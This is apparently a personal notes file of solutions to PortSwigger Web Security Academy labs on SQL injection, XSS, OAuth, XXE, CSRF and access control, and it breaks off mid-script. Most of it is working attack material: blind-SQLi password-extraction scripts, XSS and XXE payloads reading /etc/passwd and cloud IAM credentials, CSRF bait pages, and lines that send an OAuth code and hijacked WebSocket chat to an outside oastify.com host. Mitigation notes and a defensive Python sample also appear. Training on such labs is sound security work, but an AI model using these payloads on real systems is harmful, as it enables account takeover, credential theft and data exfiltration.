Target
Discovery
Analysis
Exploitation
Mitigation
Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data
Payload: ' OR 'a'='a'--
Solution:
https://ac621fd21eb2b0e1c082847f00be0097.web-security-academy.net/filter?category=%27%20OR%20%27a%27=%27a%27--
https://portswigger.net/web-security/sql-injection/lab-login-bypass
Payload: ' or '1'='1
Solution:
curl -s https://ac961fbe1e874560c0a53e2700c50025.web-security-academy.net/login -d 'csrf=02gPIAfYLxmgx07NosP5ChXUji8LZDi0&username=administrator&password=%27+or+%271%27%3D%271'
https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
Payload:
' union select null,null,null--
https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text
Payload:
' union select null,'We2TqZ',null--
https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
Payload:
' union select username,password FROM users--
https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column
Payload:
' union select null,concat(username,password) FROM users--
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle
Payload:
' UNION SELECT banner,null FROM v$version --
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft
Payload:
' union select @@version,null--%20
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle
List tables:
%27%20union%20select+TABLE_NAME,null+FROM+information_schema.tables--
List column names from selected table:
%27%20union%20select+COLUMN_NAME,null+FROM+information_schema.columns+WHERE+table_name+=+'users_dxfmgd'--
List users and passwords:
%27%20union%20select+username_ppvobv,password_vddlrf+FROM+users_dxfmgd--
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle
https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
Solution:
#!/usr/bin/python3
# Blind SQLi, conditional responses (Oracle backend): one request per candidate
# character; the "Welcome back!" string in the response is the true/false signal.
# (http://docs.python-requests.org/en/latest/)
import requests

s = requests.session()
url = "https://0a07001f038c1271c616462c001d0021.web-security-academy.net/filter?category=Pets"
password = ""
for j in range(1, 21):                # the lab password is 20 characters long
    for i in range(48, 123):          # '0'..'9' and 'a'..'z'; 'z' is 122, so the range ends at 123
        # SUBSTR(..., j, 1) selects exactly one character at position j (the original
        # used j,j which only worked because ASCII() looks at the first character)
        payload = ("sA0oQJbDuua9SbuH'+AND+ASCII(SUBSTR((SELECT+Password+FROM+Users+WHERE+Username+%3d+'administrator'),"
                   + str(j) + ",1))=" + str(i) + "--+")
        r = s.get(url, cookies=dict(TrackingId=payload))
        if 'Welcome back!' in r.text:
            password += chr(i)
            print(chr(i), end="", flush=True)
            break
print("\npassword:", password)
https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors
Solution:
#!/usr/bin/python3
# Blind SQLi, conditional errors (Oracle backend): a division by zero inside
# CASE WHEN turns a true condition into an HTTP 500.
# (http://docs.python-requests.org/en/latest/)
import requests

s = requests.session()
url = "https://0a3d009603a90aa2c3a970580085001c.web-security-academy.net/filter?category=Gifts"
password = ""
for j in range(1, 21):
    for i in range(48, 123):          # range end fixed so that 'z' (122) is included
        # SUBSTR(Password, j, 1): exactly one character at position j
        payload = ("YHjR3e0Tqh1FkBsZ' AND (SELECT CASE WHEN (ASCII(SUBSTR(Password, " + str(j) + ",1)) = " + str(i)
                   + ") THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator')='a")
        r = s.get(url, cookies=dict(TrackingId=payload))
        if r.status_code == 500:
            password += chr(i)
            print(chr(i), end="", flush=True)
            break
print("\npassword:", password)
https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based
Payload:
' AND CAST((SELECT password from users LIMIT 1) AS bool)--
https://portswigger.net/web-security/sql-injection/blind/lab-time-delays
Payload:
'%3bSELECT+pg_sleep(10)--
(appended to the existing TrackingId value: the leading quote closes the string, and the ; is URL-encoded so it is not taken as a cookie delimiter)
https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval
Solution:
#!/usr/bin/python3
# Blind SQLi, time delays (PostgreSQL backend): a pg_sleep() of DELAY seconds is the true signal.
# (https://docs.python-requests.org/en/latest/)
import datetime
import requests

s = requests.session()
url = "https://0a6e00a603ca30c5c0067c0a00470033.web-security-academy.net/filter?category=Gifts"
DELAY = 7
password = ""
for j in range(1, 21):
    for i in range(48, 123):
        # SUBSTRING(Password, j, 1): exactly one character at position j
        payload = ("'%3b SELECT CASE WHEN (ASCII(SUBSTRING(Password, " + str(j) + ",1)) = " + str(i)
                   + ") THEN pg_sleep(" + str(DELAY) + ") ELSE pg_sleep(0) END FROM users WHERE username='administrator'--")
        start = datetime.datetime.now()
        try:
            # the timeout must be comfortably above DELAY, otherwise a slow true answer raises instead of being measured
            s.get(url, cookies=dict(TrackingId=payload), timeout=DELAY + 5)
        except requests.exceptions.Timeout:
            pass                      # a timeout also means the sleep fired
        elapsed = datetime.datetime.now() - start
        if elapsed > datetime.timedelta(seconds=DELAY):
            password += chr(i)
            print(chr(i), end="", flush=True)
            break
print("\npassword:", password)
https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band
https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration
https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding
https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded
Payload: <script>alert(1)</script>
Solution:
https://ac301f9a1feab630c06628c800590004.web-security-academy.net/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded
Payload: <script>alert(1)</script>
Solution:
curl -s https://ac441f571ee3c7f6c0d47ecf009500b5.web-security-academy.net/post/comment -d 'csrf=JjGC1fbulzEdU0pPT6g2Ty2tBWcjoEaq&postId=9&comment=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&name=sdf&email=sdfsd%40sdfsdfsdf.er&website=http%3A%2F%2Fdfsd.df'
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink
Payload: "><script>alert(1)</script>
Solution:
https://aca31fc71ff01052c05f047b00ea000b.web-security-academy.net/?search=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink
Payload: <img src=1 onerror='alert(1)'/>
Solution:
https://ac9b1f881fdbcb19c0c5026f00d3008b.web-security-academy.net/?search=%3Cimg+src%3D1+onerror%3D%27alert%281%29%27%2F%3E
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sink
Payload: javascript:alert(document.cookie)
Solution:
https://accb1fd31e8cc586c08e432600d300df.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-selector-hash-change-event
Payload: <iframe src="https://acc21f141f0e6cfcc070115f007d004e.web-security-academy.net#" onload="this.src+='<img src=1 onerror=print()>'">
Solution:
Entice the victim into visiting an attacker-controlled (third-party) page carrying the payload above.
https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded
Payload: " autofocus onfocus="alert(1)
https://portswigger.net/web-security/cross-site-scripting/contexts/lab-href-attribute-double-quotes-html-encoded
Payload: javascript:alert(1)
Solution (URL-encoded body of the comment request):
csrf=0U6uy5VkRelkARZmhPEM6i1Gg6xBgqq3&postId=8&comment=QWE&name=QWE&email=abc%40xyz.com&website=javascript%3Aalert%281%29
https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-angle-brackets-html-encoded
Payload: ';alert(1)//
Vulnerability
Vulnerable component: OAuth client application
Exploitation technique: CSRF against the OAuth client application (forced profile linking)
Impact: account takeover on the OAuth client application
Implementation issue in the OAuth client application: the authorization request carries no state parameter (an unguessable value bound to the user's session that the client verifies on the callback), so the account-linking step of the OAuth flow is vulnerable to CSRF. Successful exploitation binds an attacker-controlled account at the identity provider to the victim's account on the client application, resulting in account takeover.
Exploitation
- The attacker starts the account-linking OpenID Connect flow on the OAuth client application (the blog) with the attacker's own identity-provider account.
- Halt that flow just before the OAuth service redirects the browser back to the client's redirect_uri, so the authorization code is issued but never consumed.
- Prepare a CSRF bait site with the following content, where CODE is the code value taken from the intercepted redirect response:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://aca71f891eeb2a5bc1beada2008700a3.web-security-academy.net/oauth-linking">
<input type="hidden" name="code" value="CODE" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
- Trick the victim into visiting the prepared site: their browser submits the attacker's code to /oauth-linking inside the victim's session, so the attacker's provider account gets linked to the victim's account.
Mitigation
Send a state parameter with the authorization request: an unguessable value bound to the user's session and stored server-side, which the client verifies (and invalidates) when the redirect_uri callback arrives. Reject callbacks whose state is missing or does not match:
GET /authz?client_id=ID&response_type=code&scope=SCOPE&redirect_uri=REDIRECT_URI&state=RANDOM_SESSION_BOUND_VALUE
Solution (OAuth client whose redirect_uri is not validated by the authorization server):
- Prepare the content of the exploit server:
<img src="https://oauth-0ac200710489f4088294a907025b0040.oauth-server.net/auth?client_id=ocyb4qnsgvstf8de8e07i&redirect_uri=https://xbcl3q90bijx8paegc08b6i6yx4osig7.oastify.com&response_type=code&scope=openid%20profile%20email">
- Notice the OAuth2 authorization code arriving at Collaborator: the authorization server redirected to the attacker-supplied redirect_uri.
- Log in as admin with the captured code.
https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files
Vulnerability
Exploitation
Payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf
Payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Target
https://portswigger.net/web-security/csrf/lab-no-defenses
Vulnerability
Plain CSRF. When a site uses cookie-based sessions and no CSRF tokens, there is a good chance it is vulnerable.
Exploitation
- Prepare CSRF bait site with the following content:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://accd1ff41f28b885c0cf05e5005a00b1.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="abc@xyz.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
- Trick the victim into visiting the prepared site.
Mitigation
Use the anti-CSRF mechanism offered by the web framework you're using. Alternatively, implement a robust anti-CSRF mechanism (e.g. session-bound CSRF tokens) yourself, and set the SameSite attribute on the session cookie as defence in depth.
Target
https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method
Vulnerability
An example of a badly implemented anti-CSRF mechanism. A CSRF token is in place but it is only verified when the request uses POST. The application also accepts the same action via GET and does not verify the CSRF token there.
Exploitation
- Prepare CSRF bait site with the following content:
<img src="https://ac721fed1e1e6c0bc062176100e300f5.web-security-academy.net/my-account/change-email?email=abc5%40xyz.com">
- Trick the victim into visiting the prepared site.
Mitigation
Validate the CSRF token on every request that changes state, regardless of the HTTP method, and do not accept GET for state-changing actions at all.
Target
https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present
Vulnerability
An example of badly implemented anti CSRF mechanism. CSRF token is in place but it is only verified by the application when it is present.
Exploitation
- Prepare a CSRF bait site with the following content (note that the CSRF token was removed from the request):
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac5c1fb81e71a616c03876ae00740061.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="abc@xyz.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
- Trick the victim into visiting the prepared site.
Mitigation
Reject any state-changing request whose CSRF token is absent; a missing token must be treated exactly like an invalid one.
Target
https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session
Vulnerability
An example of a badly implemented anti-CSRF mechanism. A CSRF token is in place but tokens are generated from one global pool and are accepted for every session.
Exploitation
- Log in as the carlos user.
- Retrieve a CSRF token for carlos (where SESSION is the value of carlos's session cookie):
$ curl -s --cookie session=SESSION https://acd81fd81e79befec0c22e7b00da004e.web-security-academy.net/my-account | grep \"csrf | awk -F"value" '{print $2}' | cut -d '"' -f2
- Prepare a CSRF bait site with the following content (where TOKEN is the output of the command above):
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://acd81fd81e79befec0c22e7b00da004e.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="changed@abc.com" />
<input type="hidden" name="csrf" value="TOKEN" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
- Trick the victim into visiting the prepared site.
Mitigation
Generate CSRF tokens per session and accept a token only for the session it was issued to (store it in the server-side session, or derive it from the session id with a server-side secret).
Target
https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie
Vulnerability
The CSRF token is tied to a separate csrfKey cookie rather than to the session cookie, and the search function reflects its input into a Set-Cookie response header (CRLF injection). An attacker can therefore plant their own csrfKey in the victim's browser and submit the matching token.
Exploitation
# get a csrf token that matches OUR csrfKey cookie (the token is bound to csrfKey, not to the session):
curl -s --cookie "session=vYm5cgNQ2E0iquIlRGbLN8FHHRCK4aJg;csrfKey=5wJWeNz38ZYTHW6zHASMDvbVn31Ip8e5" https://acce1fae1e59e5efc09a2f1900d800bb.web-security-academy.net/my-account | grep name=csrf | awk -F"value=" '{print $2}' | tr -d '>'
# bait page: plant our csrfKey in the victim's browser, then submit the matching token
<html>
<body>
<!-- the header injection sets csrfKey in the victim's browser; the form is submitted from onerror (the response is not an image) so that the cookie is in place before the POST goes out -->
<img src="https://acce1fae1e59e5efc09a2f1900d800bb.web-security-academy.net/?search=trash;%0d%0aSet-Cookie:%20csrfKey=5wJWeNz38ZYTHW6zHASMDvbVn31Ip8e5" onerror="document.forms[0].submit()">
<script>history.pushState('', '', '/')</script>
<form action="https://acce1fae1e59e5efc09a2f1900d800bb.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="changed@abc.com" />
<input type="hidden" name="csrf" value="6e1mTbsHYSac7ZxYPVuLQUQLv6qgrLNK" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mitigation
Bind the CSRF token to the session itself (or derive it server-side from the session id), not to a separate cookie, and fix the header injection in the search parameter.
Target
https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie
Vulnerability
The CSRF token is simply duplicated in a csrf cookie (double-submit pattern) with no server-side secret or session binding. Combined with the same header injection in the search function, the attacker can set both halves to a value of their choice.
Exploitation
<html>
<body>
<!-- plant the csrf cookie via the header injection; submit only once that response has arrived (onerror fires because the response is not an image) -->
<img src="https://ace51ff81ffda275c0e43c33006900b1.web-security-academy.net/?search=trash;%0d%0aSet-Cookie:%20csrf=5wJWeNz38ZYTHW6zHASMDvbVn31Ip8e5" onerror="document.forms[0].submit()">
<script>history.pushState('', '', '/')</script>
<form action="https://ace51ff81ffda275c0e43c33006900b1.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="changed@abc.com" />
<input type="hidden" name="csrf" value="5wJWeNz38ZYTHW6zHASMDvbVn31Ip8e5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
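The CSRF labs above (token checked only on POST, token skipped when absent, tokens shared across sessions, token tied to a cookie that header injection can plant) and the missing OAuth state parameter from the OAuth section are the same defect: a value that should be unguessable and bound to the victim's session is not. The following is an added example, not the lab application's code, of a minimal server-side implementation that closes all of them. The server secret, session store, endpoint names and OAuth URLs are assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Callable, Dict, Tuple
from urllib.parse import parse_qs, urlencode, urlparse

SERVER_SECRET = secrets.token_bytes(32)                      # assumed: loaded from config in a real deployment
AUTHZ_ENDPOINT = "https://oauth-server.example/auth"         # assumed identity provider
CLIENT_ID = "example-client-id"                              # assumed
REDIRECT_URI = "https://client.example/oauth-linking"        # assumed callback
Response = Tuple[int, str]


class Session:
    """Server-side session; the id is what the session cookie carries."""
    def __init__(self) -> None:
        self.id = secrets.token_urlsafe(32)
        self.data: Dict[str, str] = {}


def csrf_token_for(session: Session) -> str:
    """Token bound to THIS session: HMAC of the session id under a server secret.
    A token minted for another session never validates, it is never stored in a
    cookie (so header injection cannot plant it), and it needs no extra server state."""
    return hmac.new(SERVER_SECRET, session.id.encode(), hashlib.sha256).hexdigest()


def csrf_check(session: Session, form: Dict[str, str]) -> bool:
    """A missing token is a failure, never a skip; the comparison is constant-time."""
    token = form.get("csrf")
    if not token:
        return False
    return hmac.compare_digest(token.encode(), csrf_token_for(session).encode())


def change_email(session: Session, method: str, form: Dict[str, str]) -> Response:
    """Handler equivalent of /my-account/change-email in the labs."""
    if method.upper() != "POST":        # GET, including any _method=POST override, never changes state
        return 405, "method not allowed"
    if not csrf_check(session, form):
        return 403, "invalid or missing csrf token"
    session.data["email"] = form.get("email", "")
    return 200, "ok"


def begin_oauth_linking(session: Session) -> str:
    """Build the authorization request with a fresh state bound to the session."""
    state = secrets.token_urlsafe(32)
    session.data["oauth_state"] = state
    return AUTHZ_ENDPOINT + "?" + urlencode({
        "client_id": CLIENT_ID, "redirect_uri": REDIRECT_URI,
        "response_type": "code", "scope": "openid profile email", "state": state,
    })


def finish_oauth_linking(session: Session, callback_url: str,
                         exchange_code: Callable[[str], str]) -> Response:
    """Callback handler (/oauth-linking). The state is single-use and must match
    the value stored in this session: a forced-linking CSRF carries the attacker's
    code but cannot know the victim's state."""
    params = parse_qs(urlparse(callback_url).query)
    expected = session.data.pop("oauth_state", None)
    got = params.get("state", [""])[0]
    if not expected or not got or not hmac.compare_digest(expected.encode(), got.encode()):
        return 403, "state missing or mismatched"
    code = params.get("code", [""])[0]
    if not code:
        return 400, "code missing"
    session.data["linked_provider_user"] = exchange_code(code)   # stands in for the real token exchange
    return 200, "linked"
```

`exchange_code` is passed in as a callable so the callback logic can be exercised without an identity provider; in a real client it performs the code-for-token exchange and returns the provider's user id.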
https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-lax-bypass-via-method-override
Solution:
<script>
document.location="https://0a6f005e035ef74580ed03a600160080.web-security-academy.net/my-account/change-email?email=abc%40xyz.com&_method=POST"
</script>
https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-client-side-redirect
Solution:
<script>
document.location='https://0a07006203f1203f80b13fc900540009.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email?email=cba%40xyz.com%26submit=1'
</script>
https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-sibling-domain
Detecting the vulnerability:
- Launching a CSRF attack when the session cookie is set with SameSite=Strict looks hard at first, especially since we have to do more than forge a request in the victim's context: we also need to extract their chat history.
- On closer inspection we discover that:
  - a WebSocket is used, and the WS handshake is not protected against CSRF by any additional means (only via SameSite=Strict, like every other request);
  - the server leaks the sibling domain https://cms-0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net in its Access-Control-Allow-Origin header, which in the context of SameSite protection is on the same site :)
  - there is a reflected XSS at https://cms-0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net (the login username is reflected unencoded).
Exploitation:
- Launch the WS handshake CSRF (cross-site WebSocket hijacking) against the victim via the reflected XSS on the cms subdomain, exfiltrating every message to Collaborator:
<form action="https://cms-0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net/login" method="POST">
<input type="hidden" name="username" value="<script>var ws = new WebSocket('wss://0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net/chat');ws.onopen = function() {ws.send('READY');};ws.onmessage = function(event) {fetch('https://8enw61cbetm8b0dpjn3jehlh187zvsjh.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});};</script>" />
<input type="hidden" name="password" value="abc" />
</form>
<script>document.forms[0].submit()</script>
https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-cookie-refresh
Target
https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present
Vulnerability
The Referer header is only validated when it is present; a request without a Referer is accepted. The bait page suppresses the header with a referrer policy.
Exploitation
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<meta name="referrer" content="never">
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://acf21faa1e585ed3c0ef2f7f005d006c.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="abc111@xyz.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Mitigation
Treat a missing Referer as a failed check; better, do not rely on Referer at all and use session-bound CSRF tokens.
Target
https://portswigger.net/web-security/csrf/lab-referer-validation-broken
Vulnerability
The Referer check only verifies that the lab's domain appears somewhere in the header value, not that it is the origin of the request.
Exploitation
Exploit server response headers (Referrer-Policy: unsafe-url makes the browser send the full URL including the query string, which carries the lab domain):
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Referrer-Policy: unsafe-url
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/?ac021f8c1ed56638c0544264006900a4.web-security-academy.net')</script>
<form action="https://ac021f8c1ed56638c0544264006900a4.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="abc111@xyz.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Mitigation
Parse the Referer as a URL and compare its host exactly against the expected origin, and treat that only as defence in depth; rely on session-bound CSRF tokens.
Target
Vulnerability
The admin panel path is disclosed in robots.txt and the panel is reachable without authentication.
Exploitation
curl https://ac4d1fbb1eaed8dcc00d16c100c800cb.web-security-academy.net/robots.txt
curl https://ac4d1fbb1eaed8dcc00d16c100c800cb.web-security-academy.net/administrator-panel/delete?username=carlos
Mitigation
Authenticate and authorize access to the admin panel; keeping the path out of robots.txt is not a control.
Target
Vulnerability
The obfuscated admin panel URL is disclosed in the page source and the panel itself is unauthenticated.
Exploitation
curl -s https://acc01f421fc75897c08337b3009f0006.web-security-academy.net/ | grep admin
curl -s -x 127.0.0.1:8081 https://acc01f421fc75897c08337b3009f0006.web-security-academy.net/admin-1lqn53/delete?username=carlos
Mitigation
Authenticate and authorize the admin panel; an unguessable path that is embedded in the page source is not a control.
Target
Vulnerability
The authorization decision is based on an Admin=false cookie that is fully under the client's control.
Exploitation
- Authenticate in the app as wiener:peter.
- Standard Match and Replace (Burp -> Proxy -> Options -> Match and Replace) fails to replace false with true inside a cookie, so we use this extension for that: https://github.com/PortSwigger/match-replace-session-action
- With this trickery (i.e. exposing Burp's session handling engine to command line tools) we can solve the lab in one shot:
curl -k -x 127.0.0.1:8081 https://ac111f1d1fb6a221c142c01400b40093.web-security-academy.net/admin/delete?username=carlos
The proxy rewrites the Admin cookie value from false to true on the way out.
Mitigation
Never take the role from a client-side cookie; look it up server-side from the session.
Target
https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile
Vulnerability
Broken access control.
Exploitation
# 1) the role is taken from the JSON body of the profile update, so send roleid=2 (admin) along with the email change (the proxy holds the logged-in wiener session):
curl -k -x 127.0.0.1:8081 https://ac7e1ffa1eb31a27c0a9179d002400d3.web-security-academy.net/my-account/change-email -H 'Content-Type: application/json' -d '{"email":"abc@xyz.com","roleid":2}'
# 2) the admin panel is now reachable with the same session:
curl -L -k -x 127.0.0.1:8081 https://ac7e1ffa1eb31a27c0a9179d002400d3.web-security-academy.net/admin/delete?username=carlos
Mitigation
The role should be bound on the backend to the specific session. It shouldn't be possible to modify it via the roleid parameter.
Target
https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented
Vulnerability
The backend supports the legacy X-Original-URL header.
Exploitation
curl -H 'X-Original-URL: /admin/delete' -L -k -x 127.0.0.1:8081 https://ac471fb31f0ddf40c0ee5cda006b0015.web-security-academy.net/?username=carlos
Mitigation
Drop support for the X-Original-URL header.
Target
https://portswigger.net/web-security/access-control/lab-method-based-access-control-can-be-circumvented
Vulnerability
Broken access control for the GET HTTP method.
Exploitation
curl -L -k -x 127.0.0.1:8081 "https://ac911f011eed636ec0b35e63005b00d8.web-security-academy.net/admin-roles?username=wiener&action=upgrade"
(the URL is quoted; an unquoted & would send curl to the background)
Mitigation
Enforce the authorization check for every HTTP method on /admin-roles, and accept only POST for the state-changing action.
Target
https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter
Vulnerability
Exploitation
- Set up Burp to provide the authentication engine (session handling rules) for command line tools, as in the Admin cookie lab above.
- Log in via browser to the vulnerable application.
- Exploit:
KEY=$(curl -s -k -x 127.0.0.1:8081 https://ac551fec1ffeda0ac0d82a8b004e00a0.web-security-academy.net/my-account?id=carlos | grep 'API Key' | cut -d'<' -f2 | awk -F' ' '{print $NF}'); curl -k -x 127.0.0.1:8081 https://ac551fec1ffeda0ac0d82a8b004e00a0.web-security-academy.net/submitSolution -d "answer=$KEY"
Mitigation
Derive the account shown by /my-account from the session, not from the id parameter; if an id is accepted at all, verify that it equals the logged-in user's.
Target
https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter-with-unpredictable-user-ids
Vulnerability
Broken access control, horizontal escalation. The GUID of another user (carlos) is leaked in the blog content.
Exploitation
- Set up Burp to provide the authentication engine (session handling rules) for command line tools, as in the Admin cookie lab above.
- Log in via browser to the vulnerable application.
- Exploit:
cat > labSolution-user-id-controlled-by-request-parameter-with-unpredictable-user-ids.sh <<'EOF'
#!/bin/bash
URL=https://ac6e1f381f2ddfa3c0f690be00630094.web-security-academy.net
# search thru blog posts to find GUID for user carlos:
GUID=$(for i in $(seq 1 10); do curl -s -k -x 127.0.0.1:8081 ${URL}/post?postId=$i | grep userId; done | grep carlos | head -n 1 | cut -d"'" -f2 | cut -d'=' -f2)
# get carlos API key:
KEY=$(curl -s -k -x 127.0.0.1:8081 $URL/my-account?id=$GUID | grep 'API Key' | cut -d'<' -f2 | awk -F' ' '{print $NF}')
# submit solution:
curl -k -x 127.0.0.1:8081 $URL/submitSolution -d "answer=$KEY"
EOF
Mitigation
Target
https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter-with-data-leakage-in-redirect
Vulnerability
Badly implemented redirect to the /login form: the API key is revealed in the body of the redirect response.
Exploitation
cat > labSolution-User-ID-controlled-by-request-parameter-with-data-leakage-in-redirect.sh <<'EOF'
#!/bin/bash
URL=https://ac491f001f68727ec11f7815009d002c.web-security-academy.net
# get carlos API key:
KEY=$(curl -s -k $URL/my-account?id=carlos | grep 'API Key' | cut -d'<' -f2 | awk -F' ' '{print $NF}')
# submit solution:
curl -k $URL/submitSolution -d "answer=$KEY"
EOF
Mitigation
Do not render the protected page body when redirecting an unauthenticated user to /login; the 302 response must have an empty body.
Target
https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter-with-password-disclosure
Vulnerability
No access control at all! The password of every user can be read anonymously by enumerating the id parameter of the /my-account page.
Exploitation
cat > labSolution-User-ID-controlled-by-request-parameter-with-password-disclosure.sh <<'EOF'
#!/bin/bash
URL=https://aca21fa81e97e6ebc07e978f000c0088.web-security-academy.net
PROXY=127.0.0.1:8081
# create initial (anonymous) session
curl -s -c cookies.jar $URL
# get administrator password
PASSWD=$(curl -b cookies.jar -k -x $PROXY -s $URL/my-account?id=administrator | grep 'name=password' | cut -d"'" -f2)
# get CSRF token:
CSRF=$(curl -k -b cookies.jar -x $PROXY -s $URL/login | grep csrf | cut -d'"' -f6)
# log in via administrator:
curl -k -x $PROXY -b cookies.jar -s $URL/login -d "csrf=$CSRF&username=administrator&password=$PASSWD"
# delete carlos user:
curl -L -k -x $PROXY -b cookies.jar $URL/admin/delete?username=carlos
EOF
Mitigation
Never return the password to the client (not even in a hidden or prefilled form field), and serve /my-account only for the authenticated user's own id.
Target
https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references
Vulnerability
IDOR. Unprotected access to the /download-transcript/$i.txt files.
Exploitation
Exploit:
cat > labSolution-Insecure-direct-object-references.sh <<'EOF'
#!/bin/bash
URL=https://ac991fdf1e5eb44fc02c03b4002d00b6.web-security-academy.net
PROXY=127.0.0.1:8081
# create initial (anonymous) session
curl -s -c cookies.jar $URL
# get carlos password:
PASSWD=$(for i in $(seq 1 5); do curl -b cookies.jar -s $URL/download-transcript/$i.txt; done | grep 'password is' | cut -d'.' -f1 | awk '{print $NF}')
# get CSRF token:
CSRF=$(curl -k -b cookies.jar -x $PROXY -s $URL/login | grep csrf | cut -d'"' -f6)
# log in as carlos:
curl -L -k -x $PROXY -b cookies.jar -s $URL/login -d "csrf=$CSRF&username=carlos&password=$PASSWD"
EOF
Mitigation
Authorize every transcript download against the logged-in user: a user may fetch only their own transcripts, not arbitrary sequential ids.
Target
https://portswigger.net/web-security/access-control/lab-multi-step-process-with-no-access-control-on-one-step
Vulnerability
2nd step of upgrading the privileges is broken and does not require admin's permissions.
Exploitation
Exploit:
cat > labSolution-Multi-step-process-with-no-access-control-on-one-step.sh <<'EOF'
#!/bin/bash
URL=https://ac771fbe1fd10067c07a21b0005e00fd.web-security-academy.net
PROXY=127.0.0.1:8081
